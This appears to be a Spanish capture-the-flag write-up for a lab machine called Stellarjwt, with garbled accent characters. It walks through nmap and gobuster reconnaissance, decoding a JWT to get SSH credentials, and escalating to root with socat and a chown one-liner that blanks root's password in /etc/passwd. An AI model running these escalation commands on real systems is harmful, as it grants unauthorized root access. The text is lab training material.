# Stellarjwt
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.17.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```
para obtener m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web sea algo de la NASA.
Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a trav茅s de:
```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```
Encontramos un directorio `/universe` que entramos en 茅l.
### 馃殌 **EXPLOTACI脫N**
Revisando el c贸digo fuente encontramos un fragmento interesante.
Decodificamos esa cadena con esta [p谩gina](https://cyberchef.org/#recipe=JWT_Decode\(\)).
Nos logueamos con ese usuario y con la contrase帽a **Gottfried**.
```bash
ssh neptuno@172.17.0.2
```
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar. No tenemos permisos **SUDO**.
Listando los directorios tenemos un archivo oculto.
Vemos que tenemos 3 usuarios y uno de ellos es la **nasa** asi que nos logueamos ya que la contrase帽a es **Eisenhower.**
Nos llama la atenci贸n **socat** por lo que buscamos en esta [p谩gina ](https://gtfobins.github.io/gtfobins/socat/)c贸mo explotarlo.
```bash
sudo -u elite /usr/bin/socat stdin exec:/bin/sh
```
Nos llama la atenci贸n **chown** por lo que buscamos en esta [p谩gina ](https://gtfobins.github.io/gtfobins/chown/)c贸mo explotarlo.
```bash
sudo chown elite:elite /etc/ && sudo chown elite:elite /etc/passwd && echo "$(cat /etc/passwd | sed 's/root:x:/root::/g')" > /etc/passwd && su
```
